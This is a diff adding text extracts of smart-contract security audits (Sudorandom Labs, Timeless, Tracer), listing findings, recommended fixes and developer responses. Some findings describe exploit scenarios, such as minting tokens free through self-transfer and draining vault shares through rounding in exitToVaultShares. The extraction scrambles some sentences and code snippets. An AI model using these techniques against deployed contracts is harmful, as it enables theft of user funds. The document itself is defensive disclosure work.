cloneERC1155ERC20Pair comment is related to Ownable not to Reentrancy- Guard. – MerklePropertyChecker.sol#L12 comment not relevant (copy/paste from RangePropertyChecker). – StandardSettings.sol#L239 comments from what variables are make more sense to stay between ,s. • @inheritdoc can be used for inherited Natspec LinearCurve.sol#L96, – LinearCurve.sol#L15, XykCurve.sol#L24, Exponential- Curve.sol#L15, ExponentialCurve.sol#L22, ExponentialCurve.sol#L29, ExponentialCurve.sol#L96 can use @inheritdoc ICurve LinearCurve.sol#L31, LinearCurve.sol#L23, XykCurve.sol#L40, XykCurve.sol#L32, XykCurve.sol#L91, Sudorandom Labs: Acknowledged, some larger ones addressed in PR#82, the rest are acked but not changed. Spearbit: Acknowledged. 55 +5.5.31 MAX_SETTABLE_FEE value does not follow a standard notation Severity: Informational Context: StandardSettings.sol#L22 Description: The protocol establishes several constant hard-coded MAX_FEE-like variables across different con- tracts. The percentages expressed in those variables should be declared in a standard way all over the codebase. In StandardSettings.sol#L22, the standard followed by the rest of the codebase is not respected. Not respecting the standard notation may confuse the reader. Recommendation: Consider adapting a standard notation for fee amounts on the codebase. For example, set 100% as 1e18, 99% as 0.99e18 and so on. - uint96 constant MAX_SETTABLE_FEE = 2e17; // Max fee of 20% + uint96 constant MAX_SETTABLE_FEE = 0.2e18; // Max fee of 20% Sudorandom Labs: Solved in PR#79. Spearbit: Verified that this is fixed by PR#79. +5.5.32 No modifier for __Ownable_init Severity: Informational Context: OwnableWithTransferCallback.sol#L24-L26 Description: Usually __Ownable_init also has a modifier like initializer or onlyInitializing, see Own- ableUpgradeable.sol#L29. The version in OwnableWithTransferCallback.sol doesn't have this. It is not really necessary as the function is internal but it is more robust if it has. function __Ownable_init(address initialOwner) internal { _owner = initialOwner; } Recommendation: Consider adding a modifier like initializer to __Ownable_init(). Sudorandom Labs: Acknowledged, no change as the function is internal. Spearbit: Acknowledged. +5.5.33 Wrong value of seconds in year slightly affects precision Severity: Informational Context: StandardSettingsFactory.sol#L12 Description: Calculation of ONE_YEAR_SECS takes into account leap years (typically 365.25 days), looking for most exact precision. However as can be seen at NASA and stackoverflow, the value is slightly different. Current case: 365.2425 days = 31_556_952 / (24 * 3600) NASA case: 365.2422 days = 31_556_926 / (24 * 3600) Recommendation: Use 31_556_926 in ONE_YEAR_SECS for maximum precision Sudorandom Labs: Solved in PR#79. Spearbit: Verified that this is fixed by PR#79. 56 +5.5.34 Missing idempotent checks may be added for consistency Severity: Informational Context: LSSVMPairFactory.sol#L409-L413, LSSVMPairFactory.sol#L419-L423, LSSVMPairFactory.sol#L430- L433, StandardSettings.sol#L79-L81 Description: Setter functions could check if the value being set is the same as the variable's existing value to avoid doing a state variable write in such scenarios and they could also revert to flag potentially mismatched offchain-onchain states. While this is done in many places, there are a few setters missing this check. Recommendation: Add idempotent checks and consider reverting when the same value is being set. Sudorandom Labs: Acknowledged, no change. Spearbit: Acknowledged. +5.5.35 Missing events affect transparency and monitoring Severity: Informational LSSVMPair.sol#L640-L645, LSSVMPairFactory.sol#L485-L492, LSSVMPairFactory.sol#L501-L508, Context: LSSVMPairFactory.sol#L517-L524, LSSVMPairERC1155.sol#L257-L265, LSSVMPairERC1155.sol#L273-L301, LSSVMPairERC721.sol#L272-L284, LSSVMPairETH.sol#L113-L118, LSSVMPairETH.sol#L121-L123, LSSVMPairERC20.sol#L140-L147 LSSVMPairERC721.sol#L292-L300, Description: Missing events in critical functions, especially privileged ones, reduce transparency and ease of monitoring. Users may be surprised at changes affected by such functions without being able to observe related events. Recommendation: Add appropriate events to emit in critical/privileged functions. Sudorandom Labs: Acknowledged, Settings enable/disable event now tracked in PR#86, but not other changes. Spearbit: Acknowledged. +5.5.36 Wrong error returned affects debugging and off-chain monitoring Severity: Informational Context: XykCurve.sol#L71 Description: Error.INVALID_NUMITEMS is declared for 0 case, but is returned twice in the same function: first time for numItems == 0 and second time for numItems >= nftBalance. This can make hard to know why it is failing. Recommendation: Define a new error type for this case and use accordingly. enum Error { OK, // No error INVALID_NUMITEMS, // The numItem value is 0 SPOT_PRICE_OVERFLOW // The updated spot price doesn't fit into 128 bits SPOT_PRICE_OVERFLOW, // The updated spot price doesn't fit into 128 bits TOO_MANY_NUMITEMS // The numItem >= nftBalance - + + } Sudorandom Labs: Acknowledged, no change. Spearbit: Acknowledged. 57 +5.5.37 Functions can be renamed for clarity and consistency Severity: Informational Context: LSSVMPairCloner.sol#L22 LSSVMPairCloner.sol#L112 Description: Since both functions cloneETHPair() and cloneERC20Pair() use IERC721 nft as a parameter, renaming them to cloneERC721ETHPair() and cloneERC721ERC20Pair() respectively makes it clearer that the functions process ERC721 tokens. This also provides consistency in the naming of functions considering that we already have function cloneERC1155ETHPair() using this nomenclature. Recommendation: Consider renaming cloneETHPair() and cloneERC20Pair() to cloneERC721ETHPair() and cloneERC721ERC20Pair() respectively. Sudorandom Labs: Addressed in PR#82. Spearbit: Verified that this is fixed by PR#82. +5.5.38 Two events TokenDeposit() with different parameters Severity: Informational Context: LSSVMPairFactory.sol#L74, LSSVMPair.sol#L88 Description: The event TokenDeposit() of LSSVMPairFactory has an address parameter while the event Tok- enDeposit() of LSSVMPair has an uint256 parameter. This might be confusing. contract LSSVMPairFactory { ... event TokenDeposit(address poolAddress); ... } abstract contract LSSVMPair ... { ... event TokenDeposit(uint256 amount); ... } Recommendation: Consider renaming one of the event names or expand the events to both include address and amount. Sudorandom Labs: Solved in PR#81. Spearbit: Verified that this is fixed by PR#81. +5.5.39 Unused imports affect readability Severity: Informational Context: XykCurve.sol#L4-L13, LSSVMPairERC20.sol#L4-L13, LSSVMPairETH.sol#L4-L11 Description: The following imports are unused in • XykCurve.sol import {IERC721} from "@openzeppelin/contracts/token/ERC721/IERC721.sol"; import {LSSVMPair} from "../LSSVMPair.sol"; import {LSSVMPairERC20} from "../LSSVMPairERC20.sol"; import {LSSVMPairCloner} from "../lib/LSSVMPairCloner.sol"; import {ILSSVMPairFactoryLike} from "../LSSVMPairFactory.sol"; • LSSVMPairERC20.sol 58 import {IERC721} from "@openzeppelin/contracts/token/ERC721/IERC721.sol"; import {ICurve} from "./bonding-curves/ICurve.sol"; import {CurveErrorCodes} from "./bonding-curves/CurveErrorCodes.sol"; • LSSVMPairETH.sol import {IERC721} from "@openzeppelin/contracts/token/ERC721/IERC721.sol"; import {ICurve} from "./bonding-curves/ICurve.sol"; Recommendation: Remove the unused imports. Sudorandom Labs: Solved in PR#76. Spearbit: Verified that this is fixed by PR#76. +5.5.40 Use of isPair() is not intuitive Severity: Informational Context: LSSVMPairFactory.sol#L309-L322 Description: There are two usecases for isPair() 1) To check if the contract is a pair of any of the 4 types. Here the type is always retrieved via pairVariant(). 2) To check if a pair is ETH / ERC20 / ERC721 / ERC1155. Each of these values are represented by two different pair types. Using isPair() this way is not intuitive and some errors have been made in the code where only one value is tested. Note: also see issue "pairTransferERC20From only supports ERC721 NFTs". Function isPair() could be refactored to make the code easier to read and maintain. function isPair(address potentialPair, PairVariant variant) public view override returns (bool) { ... } These are the occurrences of use case 1: LSSVMPairFactory.sol: require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), "Invalid pair address"); ,! LSSVMPairFactory.sol: address"); ,! LSSVMPairFactory.sol: require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), "Invalid pair if (isPair(recipient, LSSVMPair(recipient).pairVariant())) { // router interaction, which first queries `pairVariant()` LSSVMPairERC20.sol: LSSVMPairERC20.sol: LSSVMPairERC20.sol: erc721/LSSVMPairERC721.sol: erc721/LSSVMPairERC721.sol: erc1155/LSSVMPairERC1155.sol: // router and VeryFastRouter function pairTransferERC20From(..., ILSSVMPairFactoryLike.PairVariant variant) ... { router.pairTransferERC20From(..., pairVariant()); router.pairTransferERC20From(..., pairVariant() router.pairTransferERC20From(..., pairVariant()); router.pairTransferNFTFrom(..., pairVariant()); router.pairTransferNFTFrom(..., pairVariant()); router.pairTransferERC1155From(..., pairVariant()); ... require(factory.isPair(msg.sender, variant), "Not pair"); ... } function pairTransferNFTFrom(..., ILSSVMPairFactoryLike.PairVariant variant ... { require(factory.isPair(msg.sender, variant), "Not pair"); ... ... } function pairTransferERC1155From(..., ILSSVMPairFactoryLike.PairVariant variant) ... { ... require(factory.isPair(msg.sender, variant), "Not pair"); ... } These are the occurrences of use case 2: 59 LSSVMPairFactory.sol: StandardSettings.sol: StandardSettings.sol: StandardSettings.sol: StandardSettings.sol: (isPair(...ERC721_ERC20) ...isPair(....ERC721_ETH) ...isPair(...ERC721_ERC20) ...isPair(...ERC721_ETH) ...isPair(...ERC721_ERC20) || isPair(...ERC1155_ERC20)) || ...isPair(...ERC1155_ETH) || ...isPair(...ERC1155_ERC20) || ...isPair(...ERC1155_ETH) || ...isPair(...ERC1155_ERC20) Recommendation: Consider creating two (possibly overloaded) versions of isPair(), dedicated for the both use cases. This could be something like: function isPair(address potentialPair) enum PoolTypeSelect { ETH, ERC20, ERC721, ERC1155 function isPair(address potentialPair, PoolTypeSelect // use case 1 } toCheck) // use case 2 Sudorandom Labs: Solved in PR#30. Spearbit: Verified that this is fixed by PR#30. +5.5.41 Royalty related code spread across different contracts affects readability Severity: Informational Context: LSSVMPairFactory.sol#L330-L377, RoyaltyEngine.sol Description: The contract LSSVMPairFactory contains the function authAllowedForToken(), which has a lot of interactions with external contracts related to royalties. The code is rather similar to code that is present in the RoyaltyEngine contract. Combining this code in RoyaltyEngine contract would make the code cleaner and easier to read. Recommendation: Consider moving the function authAllowedForToken() to the RoyaltyEngine contract. Sudorandom Labs: Acknowledged, though no change at the moment. Moving it to the Engine itself would incur additional gas for the CALL, as the authAllowed functions are only used for the PairFactory. So this is a gas trade-off we are willing to make in exchange for scattering the logic. Spearbit: Acknowledged. 60 diff --git a/findings_newupdate/spearbit/Timeless-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Timeless-Spearbit-Security-Review.txt new file mode 100644 index 0000000..548b694 --- /dev/null +++ b/findings_newupdate/spearbit/Timeless-Spearbit-Security-Review.txt @@ -0,0 +1,24 @@ +5.1.1 Mint PerpetualYieldTokens for free by self-transfer Severity: Critical Risk Context: PerpetualYieldToken.sol#L53 Description: The PYT.transfer and transferFrom functions operate on cached balance values. When transfer- ring tokens to oneself the decreased balance is overwritten by an increased balance which makes it possible to mint PYT tokens for free. Consider the following exploit scenario: • Attacker A self-transfers by calling token.transfer(A, token.balanceOf(A)). • balanceOf[msg.sender] is first set to zero but then overwritten by balanceOf[to] = toBalance + amount, doubling A’s balance. Recommendation: Fix the issue in transfer and transferFrom by operating on the latest storage balances instead of cached values. Timeless: Would checking for self-transfers and doing an early return be the best way to solve it? It would a Spearbit: gate.beforePerpetualYieldTokenTransfer call once to accrue the yield because the user would expect any transfer to accrue yields for from and to, and maybe someone is reliant on this. Additionally, it should also trigger the Transfer event for ERC20 compliance. nevertheless regarding efficiency should trigger best gas still be it Timeless: Not sure about triggering gate.beforePerpetualYieldTokenTransfer during self transfers, seems like a niche use case. Spearbit: Then its behavior is inconsistent. Because self-transfers are a niche use case anyway, might as well do the additional call to make it consistent. It would not increase gas cost per execution for non-self-transfer calls as you need the if branch + return anyway. Timeless: Implemented in PR #4. Spearbit: The bug still exists in transferFrom diff PR #4. You’re checking msg.sender != to but it should be from != to in this case - you always want to check the balance owners. The test should be with a spender different from from and all three parties are tester. Timeless: Nice catch, fixed in this commit. Spearbit: Acknowledged. 4 5.2 High Risk +5.2.1 xPYT auto-compound does not take pounder reward into account Severity: High Risk Context: xPYT.sol#L179 Description: Conceptually, the xPYT.pound function performs the following steps: 1. Claims yieldAmount yield for itself, deposits the yield back to receive more PYT/NYT (Gate.claimYieldEnter). 2. Buys xPYT with the NYT. 3. Performs a ERC4626.redeem(xPYT) with the bought amount, burning xPYT and receiving pytAmountRedeemed PYT. 4. Performs a ERC4626.deposit(pytAmountRedeemed + yieldAmount = pytCompounded). 5. Pays out a reward in PYT to the caller. The assetBalance is correctly updated for the first four steps but does not decrease by the pounder reward which is transferred out in the last step. The impact is that the contract has a smaller assets (PYT) balance than what is tracked in assetBalance. 1. Future depositors will have to make up for it as sweep computes the difference between these two values. 2. The xPYT exchange ratio is wrongly updated and withdrawers can redeem xPYT for more assets than they should until the last withdrawer is left holding valueless xPYT. Consider the following example and assume 100% fees for simplicity i.e. pounderReward = pytCompounded. • Vault total: 1k assets, 1k shares total supply. • pound with 100% fee: – claims Y PYT/NYT. – swaps Y NYT to X xPYT. – redeems X xPYT for X PYT by burning X xPYT (supply -= X, exchange ratio is 1-to-1 in example). – assetBalance is increased by claimed Y PYT – pounder receives a pounder reward of X + Y PYT but does not decrease assetBalance by pounder reward X+Y. • Vault totals should be 1k-X assets, 1k-X shares, keeping the same share price. • Nevertheless, vault totals actually are 1k+Y assets, 1k-X shares. Although pounder receives 100% of pound- ing rewards the xPYT price (assets / shares) increased. Recommendation: The assetBalance should also decrease by the pounderReward. assetBalance += yieldAmount; - unchecked { - - } + // using unchecked should still be fine? as pounderReward <= yieldAmount + pytAmountRedeemed. and ,! pytAmountRedeemed must have already been in the contract because of the implicit `redeem`, i.e., assetBalance >= pytAmountRedeemed ,! + assetBalance = assetBalance + yieldAmount - pounderReward; Consider adding a test that verifies correct assetBalance updates. Timeless: Implemented in PR #2. Spearbit: Acknowledged. 5 +5.2.2 Wrong yield accumulation in claimYieldAndEnter Severity: High Risk Context: Gate.sol#L590 Description: The claimYieldAndEnter function does not accrue yield to the Gate contract itself (this) in case xPYT was specified. The idea is to accrue yield for the mint recipient first before increasing/reducing their balance to not interfere with the yield rewards computation. However, in case xPYT is used, tokens are minted to the Gate before its yield is accrued. Currently, the transfer from this to xPYT through the xPYT.deposit call accrues yield for this after the tokens have been minted to it (userPYTBalance * (updatedYieldPerToken - actualUserYieldPerToken) / PRECI- SION) and its balance increased. This leads to it receiving a larger yield amount than it should have. Recommendation: Accrue yield to the address receiving the minted tokens. // accrue yield to recipient // no need to do it if the recipient is msg.sender, since // we already accrued yield in _claimYield - if (pytRecipient != msg.sender) { + if (address(xPYT) != address(0) || pytRecipient != msg.sender) _accrueYield( vault, pyt, pytRecipient, address(xPYT) == address(0) ? pytRecipient : address(this), updatedPricePerVaultShare ); - + } // mint NYTs and PYTs yieldTokenTotalSupply[vault] += yieldAmount; nyt.gateMint(nytRecipient, yieldAmount); if (address(xPYT) == address(0)) { // mint raw PYT to recipient pyt.gateMint(pytRecipient, yieldAmount); } else { // mint PYT and wrap in xPYT pyt.gateMint(address(this), yieldAmount); if (pyt.allowance(address(this), address(xPYT)) < yieldAmount) { // set PYT approval pyt.approve(address(xPYT), type(uint256).max); } xPYT.deposit(yieldAmount, pytRecipient); } Timeless: Yes, if we use sweep below we can accrue yield in the same way as in _enter. Fix implemented in PR #5. Spearbit: Acknowledged. 6 5.3 Medium Risk Severity: Medium Risk +5.3.1 Swapper left-over token balances can be stolen Context: Swapper.sol#L133, UniswapV3Swapper.sol#L187 Description: The Swapper contract may never have any left-over token balances after performing a swap because token balances can be stolen by anyone in several ways: • By using Swapper.doZeroExSwap with useSwapperBalance and tokenOut = tokenToSteal • Arbitrary token approvals to arbitrary spenders can be set on behalf of the Swapper contract using UniswapV3Swapper.swapUnderlyingToXpyt. Recommendation: All transactions must atomically move all tokens in and out of the contract when performing swaps to not leave any left-over token balances or be susceptible to front-running attacks. Timeless: Acknowledged, this is the intended way to use Swapper, it should not hold any tokens before and after a transaction. +5.3.2 TickMath might revert in solidity version 0.8 Severity: Medium Risk Context: TickMath.sol#L2 Description: UniswapV3’s TickMath library was changed to allow compilations for solidity version 0.8. However, adjustments to account for the implicit overflow behavior that the contract relies upon were not performed. The In UniswapV3xPYT.sol is compiled with version 0.8 and indirectly uses this library through the OracleLibrary. the worst case, it could be that the library always reverts (instead of overflowing as in previous versions), leading to a broken xPYT contract. The same pragma solidity >=0.5.0; instead of pragma solidity >=0.5.0 <0.8.0; adjustments have been made for the OracleLibrary and PoolAddress contracts. However, their code does not rely on implicit overflow behavior. Recommendation: Follow the implementation of the official TickMath 0.8 branch which uses unchecked blocks for every function. Consider using the official Uniswap files with two different versions of this file, one for solidity versions <0.8 and one for 0.8 from the 0.8 branch. Timeless: Implemented in PR #3. Spearbit: Acknowledged. +5.3.3 Rounding issues when exiting a vault through shares Severity: Medium Risk Context: Gate.sol#L383 Description: When exiting a vault through Gate.exitToVaultShares the user specifies a vaultSharesAmount. The amount of PYT&NYT to burn is determined by a burnAmount = _vaultSharesAmountToUnderlying- this function in derived YearnGate and ERC4626 Amount(vaultSharesAmount) call. All contract’s round down the burnAmount. This means one needs to burn fewer amounts than the value of the received vault shares. implementations of This attack can be profitable and lead to all vault shares being stolen If the gas costs of this attack are low. This can be the case with vault & underlying tokens with a low number of decimals, highly valuable shares, or cheap gas costs. Consider the following scenario: 7 • Imagine the following vault assets: totalAssets = 1.9M, supply = 1M. Therefore, 1 share is theoretically worth 1.9 underlying. • Call enterWithUnderlying(underlyingAmount = 1900) to mint 1900 PYT/NYT (and the gate receives 1900 * supply / totalAssets = 1000 vault shares). • Call exitToVaultShares(vaultSharesAmount = 1), then burnAmount = shares.mulDivDown(totalAssets(), supply) = 1 * totalAssets / supply = 1. This burns 1 "underlying" (actually PYT/NYT but they are 1-to-1), but receive 1 vault share (worth 1.9 underlying). Repeat this for up to the minted 1900 PYT/NYT. • Can redeem the 1900 vault shares for 3610 underlying directly at the vault, making a profit of 3610 - 1900 = 1710 underlying. Recommendation: The _vaultSharesAmountToUnderlyingAmount function should be replaced by a _vault- SharesAmountToUnderlyingAmountUp function which rounds up to avoid users profiting from receiving more value in vault shares than they burn in underlying. Timeless: Implemented in PR #5. Spearbit: Acknowledged. 5.4 Low Risk +5.4.1 Possible outstanding allowances from Gate Severity: Low Risk Context: Gate.sol#L216 Description: The vault parameter of Gate.enterWithUnderlying can be chosen by an attacker in such a way that underlying = vault.asset() is another vault token of the Gate itself. The subsequent _depositInto- Vault(underlying, underlyingAmount, vault) call will approve underlyingAmount of underlying tokens to the provided vault and could in theory allow stealing from other vault shares. This is currently only exploitable in very rare cases because the caller also has to transfer the underlyingAmount to the gate contract first. For example, when transferring underlyingAmount = type(uint256).max is possible due to flashloans/flashmints and the vault shares implement approvals in a way that do not decrease anymore if the allowance is type(uint256).max, as is the case with ERC4626 vaults. Recommendation: As a best practice, consider resetting the approvals to zero after the vault.deposit call (as it is assumed to consume the allowance) to make sure that after the transaction ran, there are never any outstanding approvals on arbitrary token contracts from the gate to arbitrary spenders. This mitigates other unknown attack vectors. Timeless: Implemented in PR #8. Spearbit: Acknowledged. +5.4.2 Factory.sol owner can change fees unexpectedly Severity: Low Risk Context: Factory.sol#L141 Description: The Factory.sol owner may be able to front run yield calculations in a gate implementation and change user fees unexpectedly. Recommendation: Put a time lock in place for any fee changes made by the factory owner. Timeless: Acknowledged, we’re fine with this as the Factory is planned to be owned by a Governor contract that already has built in timelock mechanics. 8 +5.4.3 Low uniswapV3TwapSecondsAgo may result in AMM manipulation in pound() Severity: Low Risk Context: UniswapV3xPYT.sol#L98 Description: The lower the value of uniswapV3TwapSecondsAgo is set with at construction creation time the easier It becomes easier for attackers to it becomes for an attacker to manipulate the results of the pound() function. manipulate automated market maker price feeds with a lower time horizon, requiring less capital to manipulate prices, although users may simply not use an xPYT contract that sets uniswapV3TwapSecondsAgo too low. Recommendation: Add a lower bound for uniswapV3TwapSecondsAgo in the constructor. Timeless: We’re fine with this, since xPYT creation is permissionless users will just choose xPYTs with security parameters they’re comfortable with. +5.4.4 UniswapV3Swapper uses wrong allowance check Severity: Low Risk Context: UniswapV3Swapper.sol#L282, UniswapV3Swapper.sol#L373 Description: Before the UniswapV3Swapper can exit a gate, it needs to set an XPYT allowance to the gate. The following check determines if an approval needs to be set: if ( args.xPYT.allowance(address(this), address(args.gate)) < tokenAmountOut ) { args.xPYT.safeApprove(address(args.gate), type(uint256).max); } args.gate.exitToUnderlying( args.recipient, args.vault, args.xPYT, tokenAmountOut ); The tokenAmountOut is in an underlying token amount but A legitimate gate.exitToUnderlying address(swapper)) checks allowance[swapper][gate] >= previewWithdraw(tokenAmountOut). is compared against an xPYT shares amount. xPYT.withdraw(tokenAmountOut, address(gate), call will call Recommendation: In practice the actual value does not matter as there is either no approval set, or an infi- nite approval. We still recommend replacing the incorrect code with a comparison against the xPYT-converted tokenAmountOut for correctness: - if (args.xPYT.allowance(address(this), address(args.gate)) < tokenAmountOut) + if (args.xPYT.allowance(address(this), address(args.gate)) < ,! args.xPYT.previewWithdraw(tokenAmountOut)) Timeless: Implemented in PR #2. Spearbit: Acknowledged. 9 +5.4.5 Missing check that tokenIn and tokenOut are different Severity: Low Risk Context: Swapper.sol#L133 Description: The doZeroExSwap() function takes in two ERC20 addresses which are tokenIn and tokenOut. The problem is that the doZeroExSwap() function does not check if the two token addresses are different from one another. Adding this check can reduce possible attack vectors. Recommendation: Consider implementing the following check. require(tokenIn != tokenOut, "Duplicate tokens"); Timeless: Implemented in PR #1. Spearbit: Acknowledged. +5.4.6 Gate.sol gives unlimitted ERC20 approval on pyt for arbitrary address Severity: Low Risk Context: Gate.sol#L675 if (address(xPYT) == address(0)) { // mint raw PYT to recipient pyt.gateMint(pytRecipient, yieldAmount); } else { // mint PYT and wrap in xPYT pyt.gateMint(address(this), yieldAmount); if (pyt.allowance(address(this), address(xPYT)) < yieldAmount) { // set PYT approval pyt.approve(address(xPYT), type(uint256).max); } xPYT.deposit(yieldAmount, pytRecipient); } Description: A malicious contract may be passed into the claimYieldAndEnter() function as xPYT and given full control over any PYT the contract may ever hold. Even though PYT is validated to be a real PYT contract and the Gate.sol contract isn’t expected to have any PYT in it, it would be safer to remove any unnecessary approvals. Recommendation: Avoid setting any approvals at all by using gateMint & sweep as _enter does. Timeless: Forgot to use sweep for this part. Implemented in PR #5. Spearbit: Acknowledged. +5.4.7 Constructor function does not check for zero address Severity: Low Risk Context: UniswapV3Juggler.sol#L81-L84 Description: The constructor function does not check if the addresses passed in are zero addresses. This check can guard against errors during deployment of the contract. Recommendation: Require checks should be added to ensure that the addresses passed into the constructor function are not zero addresses. 10 constructor(address factory_, IQuoter quoter_) { require(factory_ != address(0), "Zero address"); require(quoter_ != address(0), "Zero address"); factory = factory_; quoter = quoter_; } Also see: • xPYTFactory.sol#L20-L23 • UniswapV3xPYT.sol#L82-L83 • UniswapV3Swapper.sol#L70-L74 • Swapper.sol#L76-L78 • Factory.sol#L52 • Gate.sol#L158-L160 • NegativeYieldToken.sol#L15 • PerpetualYieldToken.sol#L15 Timeless: Acknowledged, we’re fine with this. +5.4.8 Accruing yield to msg.sender is not required when minting to xPYT contract Severity: Low Risk Context: Gate.sol#L1009 Description: The _exit function always accrues yield to the msg.sender before burning new tokens. The idea is to accrue yield for the recipient first before increasing/reducing their balance to not interfere with the yield rewards computation. However, in case xPYT is used, tokens are burned on the Gate and not msg.sender. Recommendation: For correctness & potential gas efficiency reasons only accrue the yield of the account whose tokens are being burned. That’s _accrueYield(msg.sender) in case of address(xPYT) == address(0), and this otherwise. 11 // accrue yield - _accrueYield(vault, pyt, msg.sender, updatedPricePerVaultShare); + _accrueYield(vault, pyt, address(xPYT) == address(0) ? msg.sender : address(this), ,! updatedPricePerVaultShare); // burn NYTs and PYTs unchecked { // Cannot underflow because a user's balance // will never be larger than the total supply. yieldTokenTotalSupply[vault] -= underlyingAmount; } nyt.gateBurn(msg.sender, underlyingAmount); if (address(xPYT) == address(0)) { // burn raw PYT from sender pyt.gateBurn(msg.sender, underlyingAmount); } else { /// ----------------------------------------------------------------------- /// Effects /// ----------------------------------------------------------------------- // convert xPYT to PYT then burn xPYT.withdraw(underlyingAmount, address(this), msg.sender); pyt.gateBurn(address(this), underlyingAmount); } Timeless: _accrueYield needs to be called before yieldTokenTotalSupply[vault] -= underlyingAmount;, so can wrap it in a separate (address(xPYT) == address(0)) branch. This call accrues yield to msg.sender, not this, but I guess when the sender’s using xPYT we don’t need to accrue yield to the sender since the sender’s PYT balance hasn’t changed Fix Implemented in PR #7. Spearbit: Acknowledged. 5.5 Informational +5.5.1 Unlocked solidity pragmas Severity: Informational Context: Present in most files. It is particularly the library Description: Most of the implementation code uses a solidity pragma of ˆ0.8.4. contracts that use different functions. Unlocked solidity pragmas can result in unexpected behaviors or errors with different compiler versions. Recommendation: Increase compiler version for the affected contracts and lock it. This has the added benefit of more free safety checks and optimizations by done the compiler. Note: Verify that changing the compiler does not break anything. Timeless: Implemented in PR #10. Spearbit: Acknowledged. 12 +5.5.2 No safeCast in UniswapV3Swapper’s _swap. Severity: Informational Context: UniswapV3Swapper.sol#L475 Description: It should be noted that solidity version ˆ0.8.0 doesn’t revert on overflow when type-casting. For example, if you tried casting the value 129 from uint8 to int8, it would overflow to -127 instead. This is because signed integers have a lower positive integer range compared to unsigned integers i.e -128 to 127 for int8 versus 0 to 255 for uint8. Recommendation: It is highly unlikely that this could become a problem in the mentioned context, however, we still recommend using SafeCastLib for this. Timeless: Implemented in PR #3. Spearbit: Acknowledged. +5.5.3 One step critical address change Severity: Informational Context: Ownable.sol#L37-40 Description: Setting the owner in Ownable is a one-step transaction. This situation enables the scenario of contract functionality becoming inaccessible or making it so a malicious address that was accidentally set as owner could compromise the system. Recommendation: Consider making the change of owner in the contracts a two-step process where the first trans- action (from the old/current address) registers the new address (i.e. grants ownership) and the second transaction (from the new address) claims the elevation of privileges. Timeless: Implemented in PR #11. Spearbit: Acknowledged. +5.5.4 Missing zero address checks in transfer and transferFrom functions. Severity: Informational Context: ERC20.sol#84-100 Description: The codebase uses solmate’s ERC-20 implementation. It should be noted that this library sacrifices user safety for gas optimization. As a result, their ERC-20 implementation doesn’t include zero address checks on transfer and transferFrom functions. Recommendation: Consider modifying ERC20.sol to include the missing checks. Alternatively, make it very clear to users that these controls aren’t in place, and transferring their tokens to the zero address will effectively burn them. Timeless: Acknowledged, we’re fine with this. 13 +5.5.5 Should add indexed keyword to deployed xPYT event Severity: Informational Context: xPYTFactory.sol#L15 Description: The DeployXPYT event only has the ERC20 asset_ marked as indexed while xPYT deployed can also have the indexed key word since you can use up to three per event and it will make it easier for bots to interact off chain with the protocol. Recommendation: - + event DeployXPYT(ERC20 indexed asset_, xPYT deployed); event DeployXPYT(ERC20 indexed asset_, xPYT indexed deployed); Timeless: Acknowledged, we’re fine with this +5.5.6 Missing check that tokenAmountIn is larger than zero Severity: Informational Context: Swapper.sol#L135 Description: In doZeroExSwap() there is no check that the tokenAmountIn number is larger than zero. Adding this check can add more thorough validation within the function. Recommendation: Consider implementing the code snippet below. require(tokenAmountIn > 0, "Cannot be zero"); Also, see UniswapV3xPYT.sol#L149. Timeless: Acknowledged, we’re fine with this +5.5.7 ERC20 does not emit Approval event in transferFrom Severity: Informational Context: ERC20.sol#L110 Description: The ERC20 contract does not emit new Approval events with the updated allowance in transferFrom. This makes it impossible to track approvals solely by looking at Approval events. Recommendation: Consider adding Approval events to the transferFrom function. Timeless: Why would you track approvals using events instead of just calling allowance()? Spearbit: Events can be indexed off-chain once and put into a database which is then queried for performance vs always querying an RPC node for the current allowance. As allowance is a mapping, you don’t know the keys if you want to list all approvals and therefore cannot call allowance(). But one could also argue if you really wanted to index approvals, you can also get this data some other way without events using the graph etc. It’s a difference between solmate and OpenZeppelin’s ERC20 implementations but ERC20 does indeed not require it. Timeless: Acknowledged, we’re fine with this. 14 +5.5.8 Use the official UniswapV3 0.8 branch Severity: Informational Context: FullMath.sol Description: The current repositories create local copies of UniswapV3’s codebase and manually migrate the contracts to Solidity 0.8. • For FullMath.sol this also leads to some small gas optimizations in this LOC as it uses 0 instead of type(uint256).max + 1. Recommendation: Consider using the official Uniswap V3 0.8 branch to make it easier to spot differences in the original code. Timeless: Implemented in PR #9. Spearbit: Acknowledged. The code has been modified to match the official library. The official library has not been added as a dependency. +5.5.9 No checks that provided xPYT matches PYT of the provided vault Severity: Informational Context: Gate.sol#L180-L181 Description: The Gate contracts has many functions that allow specifying vault and a xPYT addresses as pa- rameter. The underlying of the xPYT address is assumed to be the same as the vault’s PYT but this check is not enforced. Users that call the Gate functions with an xPYT contract for the wrong vault could see their de- posit/withdrawals lost. Recommendation: Consider adding a check to the functions in Gate as a safety check. require(address(xPYT) == address(0) || xPYT.asset() == getPerpetualYieldTokenForVault(vault), "xPYT is ,! for a different PYT than vault"); Timeless: Acknowledged, won’t fix since we expect users to make this check offchain and not making the check saves gas. +5.5.10 Protocol does not work with non-standard ERC20 tokens Severity: Informational Context: Gate.sol#L216 Description: Some ERC20 tokens make modifications to their ERC20’s transfer or balanceOf functions. One kind include deflationary tokens that charge certain fee for every transfer or transferFrom. Others are rebasing tokens that increase in balance over time. Using these tokens in the protocol can lead to issues such as: • Entering a vault through the Gate will not work as it tries to deposit the pre-fee amount instead of the received post-fee amount. • The UniswapV3Swapper tries to enter a vault with the pre-fee transfer amount. Recommendation: Clarify if fee-on-transfer tokens and other non-standard ERC20 tokens should be supported. Timeless: We don’t need to support fee-on-transfer tokens. 15 diff --git a/findings_newupdate/spearbit/Tracer-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Tracer-Spearbit-Security-Review.txt new file mode 100644 index 0000000..362f8c8 --- /dev/null +++ b/findings_newupdate/spearbit/Tracer-Spearbit-Security-Review.txt @@ -0,0 +1,51 @@ +5.1.1 Pool token price is incorrect when there is more than one pending upkeep Severity: Critical Context: PoolCommitter.sol#L384-391 Description: The amount of pool tokens to mint and quote tokens to burn is determined by the pool token price. This price, for a commit at update interval ID X, should not be influenced by any pending commits for IDs greater than X. However, in the current implementation price includes the current total supply but burn commits burn pool tokens immediately when commit() is called, not when upkeep() is executed. // pool token price computation at execution of updateIntervalId, example for long price priceHistory[updateIntervalId].longPrice = longBalance / 